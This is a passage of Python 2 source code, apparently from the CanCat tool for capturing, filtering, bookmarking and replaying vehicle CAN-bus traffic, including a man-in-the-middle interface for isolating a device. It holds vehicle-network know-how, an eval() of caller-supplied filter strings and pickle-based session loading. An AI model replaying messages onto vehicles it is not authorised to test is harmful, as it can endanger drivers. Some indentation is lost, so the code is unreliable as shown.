response = self.recv(CMD_CAN_MODE_RESULT, wait=30)
def ping(self, buf='ABCDEFGHIJKL'):
    '''
    Utility function, only to send and receive data from the
    CanCat Transceiver.  Has no effect on the CAN bus.
    '''
    self._send(CMD_PING, buf)
    return self.recv(CMD_PING_RESPONSE, wait=3)
def genCanMsgs(self, start=0, stop=None, arbids=None, tail=False, maxsecs=None):
    '''
    CAN message generator.  takes in start/stop indexes as well as a list
    of desired arbids (list).  Yields (idx, ts, arbid, data) tuples where
    ts is an offset from the first captured message's timestamp.

    maxsecs limits the number of seconds this generator will go for.  it's intended
    for use with tail (tail=True blocks waiting for new messages).
    '''
    messages = self._messages.get(CMD_CAN_RECV, None)
    # get the ts of the first received message
    if messages != None and len(messages):
        startts = messages[0][0]
    else:
        startts = time.time()
    # NOTE(review): if no messages have ever arrived, `messages` is None
    # and len(messages) below raises TypeError -- confirm callers
    if start == None:
        start = self.getCanMsgCount()
    if stop == None or tail:
        stop = len(messages)
    else:
        stop = stop + 1 # This makes the stop index inclusive if specified
    starttime = time.time()
    idx = start
    while tail or idx < stop:
        # obey our time restrictions
        # placed here to ensure checking whether we're receiving messages or not
        if maxsecs != None and time.time() > maxsecs+starttime:
            return
        # if we're off the end of the original request, and "tailing"
        if tail and idx >= stop:
            msglen = len(messages)
            self.log("stop=%d len=%d" % (stop, msglen), 3)
            if stop == msglen:
                self.log("waiting for messages", 3)
                # wait for trigger event so we're not constantly polling
                self._msg_events[CMD_CAN_RECV].wait(1)
                self._msg_events[CMD_CAN_RECV].clear()
                self.log("received 'new messages' event trigger", 3)
            # we've gained some messages since last check...
            stop = len(messages)
            continue # to the big message loop.
        # now actually handle messages
        ts, msg = messages[idx]
        # make ts an offset instead of the real time.
        ts -= startts
        arbid, data = self._splitCanMsg(msg)
        if arbids != None and arbid not in arbids:
            # allow filtering of arbids
            idx += 1
            continue
        yield((idx, ts, arbid, data))
        idx += 1
def _splitCanMsg(self, msg):
    '''
    Split a captured message into (arbid, data).

    Does not check msg size: it MUST be at least 4 bytes, since the tool
    always sends a 4-byte big-endian arbid before the data.
    '''
    (arbid,) = struct.unpack(">I", msg[:4])
    return arbid, msg[4:]
def getCanMsgCount(self):
    '''Return how many CAN messages have been received this session.'''
    return len(self._messages.get(CMD_CAN_RECV, []))
def printSessionStatsByBookmark(self, start=None, stop=None):
'''
Prints session stats only for messages between two bookmarks
'''
print self.getSessionStatsByBookmark(start, stop)
def printSessionStats(self, start=0, stop=None):
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print self.getSessionStats(start, stop)
def getSessionStatsByBookmark(self, start=None, stop=None):
    '''
    Session stats (see getSessionStats) bounded by bookmark indexes.
    start/stop of None mean "from the beginning" / "to the end".
    '''
    start_msg = self.getMsgIndexFromBookmark(start) if start != None else 0
    stop_msg = self.getMsgIndexFromBookmark(stop) if stop != None else self.getCanMsgCount()
    return self.getSessionStats(start=start_msg, stop=stop_msg)
def getArbitrationIds(self, start=0, stop=None, reverse=False):
    '''
    Return a list of (message_count, arbid, [(ts, data), ...]) tuples,
    sorted by message count (ascending unless reverse=True).
    '''
    grouped = {}
    for idx, ts, arbid, data in self.genCanMsgs(start, stop):
        grouped.setdefault(arbid, []).append((ts, data))
    arbid_list = [(len(msgs), arbid, msgs) for arbid, msgs in grouped.items()]
    arbid_list.sort(reverse=reverse)
    return arbid_list
def getSessionStats(self, start=0, stop=None):
    # Render per-arbid timing statistics (mean / median / high / low
    # inter-message delta in seconds) for messages between the two
    # indexes, most frequent arbids first.
    # NOTE(review): "median" here is computed as the midrange
    # (low + (high-low)/2), not a true median.
    out = []
    arbid_list = self.getArbitrationIds(start=start, stop=stop, reverse=True)
    for datalen, arbid, msgs in arbid_list:
        last = 0
        high = 0
        low = 0xffffffff
        for ts, data in msgs:
            if last == 0:
                # first message: just prime `last`, no delta to measure yet
                last = ts
                continue
            # calculate the high and low
            delta = ts - last
            if delta > high:
                high = delta
            if delta < low:
                low = delta
            # track repeated values (rounded to nearest .001 sec)
            last = ts
        if datalen > 1:
            # mean gap = total elapsed span / number of gaps
            mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
            median = low + (high-low) / 2
        else:
            low = 0
            mean = 0
            median = mean
        out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
                (arbid, datalen, mean, median, high, low))
    msg_count = self.getCanMsgCount()
    out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
    return '\n'.join(out)
def loadFromFile(self, filename, force=False):
    '''
    Load a previous analysis session from a saved file
    see: saveSessionToFile()
    '''
    # BUG FIX: use a context-managed binary open() instead of the old
    # file() call, which leaked the handle and broke pickles on Windows
    with open(filename, 'rb') as f:
        me = pickle.load(f)
    self.restoreSession(me, force=force)
    self._filename = filename
def restoreSession(self, me, force=False):
    '''
    Load a previous analysis session from a python dictionary object
    see: saveSession()
    '''
    # refuse to clobber a live capture unless explicitly forced
    if isinstance(self._io, serial.Serial) and force==False:
        print("Refusing to reload a session while active session! use 'force=True' option")
        return
    for attr, key in (('_messages', 'messages'),
                      ('bookmarks', 'bookmarks'),
                      ('bookmark_info', 'bookmark_info'),
                      ('comments', 'comments')):
        setattr(self, attr, me.get(key))
def saveSessionToFile(self, filename=None):
    '''
    Saves the current analysis session to the filename given
    If saved previously, the name will already be cached, so it is
    unnecessary to provide it again.
    '''
    if filename != None:
        self._filename = filename
    elif self._filename == None:
        raise Exception('Cannot save to file when no filename given (and first time save)')
    else:
        filename = self._filename
    savegame = self.saveSession()
    me = pickle.dumps(savegame)
    # BUG FIX: write through a context-managed open() in *binary* mode;
    # the old file(filename, 'w') leaked the handle and could corrupt
    # pickle data on Windows via newline translation
    with open(filename, 'wb') as outfile:
        outfile.write(me)
def saveSession(self):
    '''
    Save the current analysis session to a python dictionary object.
    What you do with it from there is your own business.
    This function is called by saveSessionToFile() to get the data
    to save to the file.
    '''
    return {
        'messages': self._messages,
        'bookmarks': self.bookmarks,
        'bookmark_info': self.bookmark_info,
        'comments': self.comments,
    }
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
    '''
    Save a named bookmark (with optional comment).
    This stores the message index number from the
    CMD_CAN_RECV mailbox.

    DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
    '''
    mbox = self._messages.get(CMD_CAN_RECV)
    msg_index = 0 if mbox == None else len(mbox)
    bkmk_index = len(self.bookmarks)
    self.bookmarks.append(msg_index)
    # keyed by bookmark index (should this be msg_index? benefit either way?)
    self.bookmark_info[bkmk_index] = {'name': name, 'comment': comment}
    return bkmk_index
def getMsgIndexFromBookmark(self, bkmk_index):
    '''Return the CMD_CAN_RECV message index recorded for a bookmark.'''
    return self.bookmarks[bkmk_index]
def getBookmarkFromMsgIndex(self, msg_index):
    '''Return the first bookmark index recorded at the given message index.'''
    return self.bookmarks.index(msg_index)
def setCanBookmarkName(self, bkmk_index, name):
    '''Rename an existing bookmark.'''
    info = self.bookmark_info[bkmk_index]
    # BUG FIX: was info[name] = name, which stored under the new name as
    # the key instead of updating the 'name' field
    info['name'] = name
def setCanBookmarkComment(self, bkmk_index, comment):
    '''Set the comment of an existing bookmark.'''
    info = self.bookmark_info[bkmk_index]
    # BUG FIX: was info[name] = name -- referenced the undefined `name`
    # (NameError) and ignored `comment` entirely
    info['comment'] = comment
def setCanBookmarkNameByMsgIndex(self, msg_index, name):
    '''Rename the bookmark recorded at the given message index.'''
    bkmk_index = self.bookmarks.index(msg_index)
    info = self.bookmark_info[bkmk_index]
    # BUG FIX: was info[name] = name; update the 'name' field instead
    info['name'] = name
def setCanBookmarkCommentByMsgIndex(self, msg_index, comment):
    '''Set the comment of the bookmark recorded at the given message index.'''
    bkmk_index = self.bookmarks.index(msg_index)
    info = self.bookmark_info[bkmk_index]
    # BUG FIX: was info[name] = name -- referenced the undefined `name`
    # and never stored the comment
    info['comment'] = comment
def snapshotCanMessages(self, name=None, comment=None):
    '''
    Save bookmarks at the start and end of some event you are about to do
    Bookmarks are named "Start_" + name and "Stop_" + name

    DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!

    Returns (start_bkmk_index, stop_bkmk_index).
    '''
    start_bkmk = self.placeCanBookmark("Start_" + name, comment)
    raw_input("Press Enter When Done...")
    stop_bkmk = self.placeCanBookmark("Stop_" + name, comment)
    # previously both indexes were computed and then dropped; return them
    # so callers can feed the snapshot straight into the *ByBookmark APIs
    return start_bkmk, stop_bkmk
def filterCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
                arbids=None, ignore=[], advfilters=[]):
    '''
    Bookmark-based wrapper around filterCanMsgs(): translates bookmark
    indexes into message indexes and delegates.  None bounds mean
    "from the beginning" / "to the end".
    '''
    if start_bkmk != None:
        start_msg = self.getMsgIndexFromBookmark(start_bkmk)
    else:
        start_msg = 0
    if stop_bkmk != None:
        stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
    else:
        # BUG FIX: this branch assigned stop_bkmk = -1 and left stop_msg
        # undefined, causing a NameError below; None means "to the end"
        stop_msg = None
    if start_baseline_bkmk != None:
        start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
    else:
        start_baseline_msg = None
    if stop_baseline_bkmk != None:
        stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
    else:
        stop_baseline_msg = None
    return self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def _getLocals(self, idx, ts, arbid, data):
    '''Build the namespace handed to eval() for advfilters expressions.'''
    return dict(idx=idx, ts=ts, arbid=arbid, data=data)
def filterCanMsgs(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], tail=False, maxsecs=None):
    '''
    returns the received CAN messages between indexes "start_msg" and "stop_msg"
    but only messages to ID's that *do not* appear in the the baseline indicated
    by "start_baseline_msg" and "stop_baseline_msg".

    for message indexes, you *will* want to look into the bookmarking subsystem!

    Yields (idx, ts, arbid, msg) tuples.
    '''
    self.log("starting filtering messages...")
    if stop_baseline_msg != None:
        self.log("ignoring arbids from baseline...")
        # get a list of baseline arbids
        filter_ids = { arbid:1 for idx,ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
                }.keys()
    else:
        filter_ids = None
    self.log("filtering messages...")
    if arbids != None and type(arbids) != list:
        # a single arbid was handed in; normalize to a list
        arbids = [arbids]
    for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids, tail=tail, maxsecs=maxsecs):
        # keep the message if explicitly requested via arbids, or if it is
        # neither in `ignore` nor in the baseline arbid set
        if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
            self.log("skipping message: (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
            continue
        # advanced filters allow python code to be handed in.  if any of the python code snippits result in "False" or 0, skip this message
        # NOTE: advfilters are eval()'d -- only hand in trusted expressions
        skip = False
        for advf in advfilters:
            lcls = self._getLocals(idx, ts, arbid, msg)
            if not eval(advf, lcls):
                skip = True
        if skip:
            self.log("skipping message(adv): (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
            continue
        yield (idx, ts, arbid, msg)
def printCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
print self.reprCanMsgsByBookmark(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters)
def reprCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
    '''
    deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)

    Translates bookmark indexes to message indexes and delegates to
    reprCanMsgs(); None bounds mean "from the beginning" / "to the end".
    '''
    if start_bkmk != None:
        start_msg = self.getMsgIndexFromBookmark(start_bkmk)
    else:
        start_msg = 0
    if stop_bkmk != None:
        stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
    else:
        # BUG FIX: this branch assigned stop_bkmk = -1 and left stop_msg
        # undefined, causing a NameError below; None means "to the end"
        stop_msg = None
    if start_baseline_bkmk != None:
        start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
    else:
        start_baseline_msg = None
    if stop_baseline_bkmk != None:
        stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
    else:
        stop_baseline_msg = None
    # (removed an unused `out = []` local)
    return self.reprCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, paginate=None, viewbits=VIEW_ALL):
    # Print rendered CAN messages; see reprCanMsgsLines for the filtering
    # and viewbits semantics.  paginate=N pauses for Enter every N lines.
    data = self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, viewbits=viewbits)
    pidx = 0
    try:
        while True:
            line = data.next()
            # a generator item may itself contain newlines; paginate per
            # printed line, not per generator item
            lines = line.split('\n')
            for thing in lines:
                print thing
                pidx += 1
                if paginate != None and pidx % paginate == 0:
                    inp = raw_input("PRESS ENTER TO CONTINUE")
    except StopIteration:
        # generator exhausted: all requested messages printed
        pass
def reprCanMsgsLines(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
    # FIXME: make different stats selectable using a bitfield arg (eg. REPR_TIME_DELTA | REPR_ASCII)
    '''
    String representation of a set of CAN Messages.
    These can be filtered by start and stop message indexes, as well as
    use a baseline (defined by start/stop message indexes),
    by a list of "desired" arbids as well as a list of
    ignored arbids
    Many functions wrap this one.
    viewbits is a bitfield made up of VIEW_* options OR'd together:
        ... viewbits=VIEW_ASCII|VIEW_COMPARE)

    Generator: yields one formatted output line at a time.
    '''
    # bookmark arguments, when given, override the raw message indexes
    if start_bkmk != None:
        start_msg = self.getMsgIndexFromBookmark(start_bkmk)
    if stop_bkmk != None:
        stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
    if (viewbits & VIEW_BOOKMARKS) and start_msg in self.bookmarks:
        bkmk = self.bookmarks.index(start_msg)
        yield ("starting from bookmark %d: '%s'" %
               (bkmk,
                self.bookmark_info[bkmk].get('name'))
               )
    if (viewbits & VIEW_BOOKMARKS) and stop_msg in self.bookmarks:
        bkmk = self.bookmarks.index(stop_msg)
        yield ("stoppng at bookmark %d: '%s'" %
               (bkmk,
                self.bookmark_info[bkmk].get('name'))
               )
    last_msg = None
    next_bkmk = 0
    next_bkmk_idx = 0
    msg_count = 0
    last_ts = None
    tot_delta_ts = 0
    counted_msgs = 0    # used for calculating averages, excluding outliers
    data_delta = None
    data_repeat = 0
    data_similar = 0
    for idx, ts, arbid, msg in self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters, tail=tail):
        # insert bookmark names/comments in appropriate places
        while next_bkmk_idx < len(self.bookmarks) and idx >= self.bookmarks[next_bkmk_idx]:
            yield (self.reprBookmark(next_bkmk_idx))
            next_bkmk_idx += 1
        msg_count += 1
        diff = []
        # check data: count how many payload bytes changed since the last message
        byte_cnt_diff = 0
        if (viewbits & VIEW_COMPARE) and last_msg != None:
            if len(last_msg) == len(msg):
                for bidx in range(len(msg)):
                    if last_msg[bidx] != msg[bidx]:
                        byte_cnt_diff += 1
                if byte_cnt_diff == 0:
                    diff.append("REPEAT")
                    data_repeat += 1
                elif byte_cnt_diff <= 4:
                    diff.append("Similar")
                    data_similar += 1
                # FIXME: make some better heuristic to identify "out of norm"
        # look for ASCII data (4+ consecutive bytes)
        if (viewbits & VIEW_ASCII) and hasAscii(msg):
            diff.append("ASCII: %s" % repr(msg))
        # calculate timestamp delta and comment if out of whack
        if last_ts == None:
            last_ts = ts
        delta_ts = ts - last_ts
        if counted_msgs:
            avg_delta_ts = tot_delta_ts / counted_msgs
        else:
            avg_delta_ts = delta_ts
        # deltas within one delta of the running average are folded into it;
        # outliers are flagged instead of skewing the average
        if abs(delta_ts - avg_delta_ts) <= delta_ts:
            tot_delta_ts += delta_ts
            counted_msgs += 1
        elif (viewbits & VIEW_TS_DELTA):
            diff.append("TS_delta: %.3f" % delta_ts)
        if pretty:
            # blank separator line on large (>= .95s) gaps for readability
            if delta_ts >= .95:
                yield ('')
        msgrepr = self._reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff))
        # allow _reprCanMsg to return None to skip printing the message
        if msgrepr != DONT_PRINT_THIS_MESSAGE:
            yield msgrepr
        last_ts = ts
        last_msg = msg
    if viewbits & VIEW_ENDSUM:
        yield ("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
def reprCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
    '''
    Return the full newline-joined string form of the selected messages.
    Thin wrapper: all selection and formatting happens in reprCanMsgsLines().
    '''
    lines = self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk,
                                  start_baseline_msg, stop_baseline_msg,
                                  arbids, ignore, advfilters, pretty, tail, viewbits)
    return "\n".join(lines)
def _reprCanMsg(self, idx, ts, arbid, msg, comment=None):
    # Hook point: subclasses may override to customize per-message rendering
    # (returning DONT_PRINT_THIS_MESSAGE suppresses a line -- see reprCanMsgsLines).
    return reprCanMsg(idx, ts, arbid, msg, comment=comment)
def printCanSessions(self, arbid_list=None, advfilters=[]):
    '''
    Split CAN messages into Arbitration ID's and prints entire
    sessions for each CAN id.
    Defaults to printing by least number of messages, including all IDs
    Or... provide your own list of ArbIDs in whatever order you like

    Interactive: after each arbid's session the user can replay it
    (real-time, fast, or interactive pacing) or quit.
    '''
    if arbid_list == None:
        arbids = self.getArbitrationIds()
    else:
        # getArbitrationIds() returns (count, arbid, msgs) tuples; keep only requested ids
        arbids = [arbdata for arbdata in self.getArbitrationIds() if arbdata[1] in arbid_list]
    for datalen, arbid, msgs in arbids:
        print self.reprCanMsgs(arbids=[arbid], advfilters=advfilters)
        cmd = raw_input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, Q)uit: ").upper()
        # empty input or 'N' advances to the next arbid
        while len(cmd) and cmd != 'N':
            if cmd == 'R':
                self.CANreplay(arbids=[arbid], timing=TIMING_REAL)
            elif cmd == 'F':
                self.CANreplay(arbids=[arbid], timing=TIMING_FAST)
            elif cmd == 'I':
                self.CANreplay(arbids=[arbid], timing=TIMING_INTERACTIVE)
            elif cmd == 'Q':
                return
            cmd = raw_input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, Q)uit: ").upper()
        print
def printBookmarks(self):
    '''
    Print out the list of current Bookmarks and where they sit
    '''
    print(self.reprBookmarks())
def printAsciiStrings(self, minbytes=4, strict=True):
    '''
    Search through messages looking for ASCII strings

    Prints every message whose payload contains at least 'minbytes' of
    printable ASCII (with strict=True, the whole payload must be printable).
    '''
    for idx, ts, arbid, msg in self.genCanMsgs():
        if hasAscii(msg, minbytes=minbytes, strict=strict):
            print reprCanMsg(idx, ts, arbid, msg, repr(msg))
def reprBookmarks(self):
    '''
    Build the newline-joined string representation of every bookmark.
    '''
    reprs = [self.reprBookmark(bid) for bid in range(len(self.bookmarks))]
    return '\n'.join(reprs)
def reprBookmark(self, bid):
    '''
    Render one bookmark as a tab-separated line; the comment column is
    only included when a comment was recorded.
    '''
    msgidx = self.bookmarks[bid]
    info = self.bookmark_info.get(bid)
    comment = info.get('comment')
    name = info.get('name')
    if comment == None:
        return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, name)
    return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s \tcomment: %s" % (bid, msgidx, name, comment)
def setMaskAndFilter(self,
                     mask0=0,
                     mask1=0,
                     filter0=0,
                     filter1=0,
                     filter2=0,
                     filter3=0,
                     filter4=0,
                     filter5=0):
    '''
    Set the filters and masks. The mask determines which bits matter for the filter following the
    below truth table:
     _____________________________________________________________________________
    | Mask Bit n | Filter Bit n | Arbitration ID bit n  | Accept or Reject        |
    |     0      |      X       |           X           |        Accept           |
    |     1      |      0       |           0           |        Accept           |
    |     1      |      0       |           1           |        Reject           |
    |     1      |      1       |           0           |        Reject           |
    |     1      |      1       |           1           |        Accept           |
     -----------------------------------------------------------------------------
    There are two RX buffers. mask0 and filters 0 and 1 apply to buffer 0. mask1 and the other four filters
    apply to buffer 1.

    Returns whatever the device responds to the CMD_SET_FILT_MASK command.
    '''
    # eight big-endian uint32 values: the two masks, then the six filters
    msg = struct.pack('>IIIIIIII', mask0, mask1, filter0, filter1, filter2, filter3, filter4, filter5)
    return self._send(CMD_SET_FILT_MASK, msg)
def clearMaskAndFilter(self):
    '''
    Clears all masks and filters
    '''
    # eight zeroed big-endian uint32 fields: mask0, mask1, filter0..filter5
    msg = struct.pack('>IIIIIIII', *([0] * 8))
    return self._send(CMD_SET_FILT_MASK, msg)
class CanControl(cmd.Cmd):
    '''
    Command User Interface (as if ipython wasn't enough!)
    '''
    def __init__(self, serialdev=serialdev, baud=baud):
        cmd.Cmd.__init__(self)
        self.serialdev = serialdev
        # BUG fix: the 'baud' parameter was never stored, so the original
        # read of self._baud below raised AttributeError.
        self._baud = baud
        self.canbuf = CanBuffer(self.serialdev, self._baud)
def getAscii(msg, minbytes=3):
    '''
    Return a list of the printable-ASCII substrings of msg that are at
    least minbytes characters long.

    (Docstring fix: the original mentioned a 'strict' argument that this
    function never had -- that flag belongs to hasAscii().)
    '''
    strings = []
    ascii_count = 0     # length of the current printable run
    startidx = None     # index where the current run began
    for bidx in range(len(msg)):
        byte = msg[bidx]
        # printable ASCII is 0x20 (space) through 0x7e (~)
        if 0x20 <= ord(byte) < 0x7f:
            if startidx == None:
                startidx = bidx
            ascii_count += 1
        else:
            # non printable char: if we reached the magic threshold, package it
            if ascii_count >= minbytes:
                strings.append(msg[startidx:bidx])
            # reset counters
            ascii_count = 0
            startidx = None
    # in case we have a string all the way to the end
    if ascii_count >= minbytes:
        strings.append(msg[startidx:])
    return strings
def hasAscii(msg, minbytes=3, strict=False):
    '''
    Return 1 if msg contains a run of at least minbytes printable-ASCII
    characters, else 0.  With strict=True, the first non-printable byte
    causes an immediate 0 (i.e. the whole message must be clean ASCII).

    (Docstring fix: the original said "if minbytes == -1, every character
    has to be clean ASCII", which described neither parameter.)
    '''
    ascii_match = 0
    ascii_count = 0
    for byte in msg:
        # printable ASCII is 0x20 (space) through 0x7e (~)
        if 0x20 <= ord(byte) < 0x7f:
            ascii_count += 1
            if ascii_count >= minbytes:
                ascii_match = 1
        else:
            if strict:
                return 0
            ascii_count = 0
    return ascii_match
def reprCanMsg(idx, ts, arbid, data, comment=None):
    #TODO: make some repr magic that spits out known ARBID's and other subdata
    '''
    Format one CAN message as a single fixed-width line:
    index, timestamp, arbitration id, payload length, hex payload, comment.
    Python 2 only: relies on str.encode('hex').
    '''
    if comment == None:
        comment = ''
    return "%.8d %8.3f ID: %.3x,  Len: %.2x, Data: %-18s\t%s" % (idx, ts, arbid, len(data), data.encode('hex'), comment)
class FordInterface(CanInterface):
    '''
    CanInterface with convenience baud-rate setters named after the
    Ford CAN buses they correspond to.
    '''
    def setCanBaudHSCAN(self):
        # high-speed CAN: 500kbps
        self.setCanBaud(CAN_500KBPS)
    def setCanBaudMSCAN(self):
        # medium-speed CAN: 125kbps
        self.setCanBaud(CAN_125KBPS)
    def setCanBaudICAN(self):
        # infotainment CAN: 500kbps
        self.setCanBaud(CAN_500KBPS)
class GMInterface(CanInterface):
    '''
    CanInterface with convenience baud-rate setters for GM buses.

    DLC port:
        SW-LS-CAN   - pin 1                 33kbps
        MS-CAN      - pins 3+ and 11-       95kbps
        DW-FT-CAN   - pins 1+ and 9-        <125kbps
        HS-CAN      - pins 6+ and 14-       500kbps
    '''
    def setCanBaudHSCAN(self):
        self.setCanBaud(CAN_500KBPS)
    def setCanBaudMSCAN(self):
        self.setCanBaud(CAN_95KBPS)
    def setCanBaudLSCAN(self):
        self.setCanBaud(CAN_33KBPS)
class CanInTheMiddleInterface(CanInterface):
    def __init__(self, port=serialdev, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None):
        '''
        CAN in the middle. Allows the user to determine what CAN messages are being
        sent by a device by isolating a device from the CAN network and using two
        Can shields on one Arduino to relay the CAN messages to each other.

        Device<----->Isolation CanCat<----->Arduino<----->Vehicle CanCat<----->Vehicle
                CAN                   SPI      |      SPI              CAN
                                               |
                                               | < Serial
                                               PC

        This solves the problem of not being able to determine which device is sending
        which CAN message, since CAN messages have no source information and all messages
        are broadcast.

        The Can shield connected to the device is referred to as the isolation CanCat.
        This CanCat should be modified so that the CS SPI pin is connected to D10, rather
        than the default of D9. This is accomplished by cutting a trace on the circuit
        board and bridging the CS pad to the D10 pad. Seeedstudio has instructions
        on their Wiki, but their shield differed slightly from my board. The CanCat
        connected to the vehicle is referred to as the vehicle CanCat and should be unmodified.
        '''
        # isolation-side bookmarks, kept separate from the base class's lists
        self.bookmarks_iso = []
        self.bookmark_info_iso = {}
        CanInterface.__init__(self, port=port, baud=baud, verbose=verbose, cmdhandlers=cmdhandlers, comment=comment, load_filename=load_filename, orig_iface=orig_iface)
        # only talk to hardware when not replaying from a saved session file
        if load_filename is None:
            self.setCanMode(CMD_CAN_MODE_CITM)
def genCanMsgsIso(self, start=0, stop=None, arbids=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    CAN message generator. takes in start/stop indexes as well as a list
    of desired arbids (list). Uses the isolation messages.

    Yields (index, timestamp, arbid, data) tuples.
    '''
    messages = self._messages.get(CMD_ISO_RECV, [])
    if stop == None:
        stop = len(messages)
    else:
        # caller's stop index is inclusive
        stop = stop + 1
    for idx in xrange(start, stop):
        ts, msg = messages[idx]
        arbid, data = self._splitCanMsg(msg)
        if arbids != None and arbid not in arbids:
            # allow filtering of arbids
            continue
        yield((idx, ts, arbid, data))
def getCanMsgCountIso(self):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    the number of CAN messages we've received on the isolation side session
    '''
    return len(self._messages.get(CMD_ISO_RECV, []))
def printSessionStatsByBookmarkIso(self, start=None, stop=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Prints session stats only for messages between two bookmarks
    '''
    print self.getSessionStatsByBookmarkIso(start, stop)
def printSessionStatsIso(self, start=0, stop=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
    between two message indexes (where they sit in the CMD_CAN_RECV
    mailbox)
    '''
    print self.getSessionStatsIso(start, stop)
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
def getSessionStatsByBookmarkIso(self, start=None, stop=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    returns session stats by bookmarks

    None on either end means "start of capture" / "end of capture".
    '''
    start_msg = self.getMsgIndexFromBookmarkIso(start) if start != None else 0
    stop_msg = self.getMsgIndexFromBookmarkIso(stop) if stop != None else self.getCanMsgCountIso()
    return self.getSessionStatsIso(start=start_msg, stop=stop_msg)
def getArbitrationIdsIso(self, start=0, stop=None, reverse=False):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    return a list of Arbitration IDs

    Each entry is (message_count, arbid, [(ts, data), ...]), sorted by
    count (ascending unless reverse=True).
    '''
    arbids = {}
    for idx, ts, arbid, data in self.genCanMsgsIso(start, stop):
        arbids.setdefault(arbid, []).append((ts, data))
    arbid_list = [(len(msgs), arbid, msgs) for arbid, msgs in arbids.items()]
    arbid_list.sort(reverse=reverse)
    return arbid_list
def getSessionStatsIso(self, start=0, stop=None):
    # FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
    '''
    Build a per-arbid timing summary (mean/median/high/low inter-message
    delta in seconds) for the isolation-side capture, most-frequent ids
    first, plus a totals footer.
    '''
    out = []
    arbid_list = self.getArbitrationIdsIso(start=start, stop=stop, reverse=True)
    for datalen, arbid, msgs in arbid_list:
        last = 0
        high = 0
        low = 0xffffffff
        for ts, data in msgs:
            # first message only seeds 'last'; no delta to measure yet
            if last == 0:
                last = ts
                continue
            # calculate the high and low
            delta = ts - last
            if delta > high:
                high = delta
            if delta < low:
                low = delta
            # track repeated values (rounded to nearest .001 sec)
            last = ts
        if datalen > 1:
            mean = (msgs[-1][0] - msgs[0][0]) / (datalen - 1)
            # NOTE(review): this "median" is actually the midrange of the deltas
            median = low + (high - low) / 2
        else:
            low = 0
            mean = 0
            median = mean
        out.append("id: 0x%x\tcount: %d\ttiming::  mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
                   (arbid, datalen, mean, median, high, low))
    msg_count = self.getCanMsgCountIso()
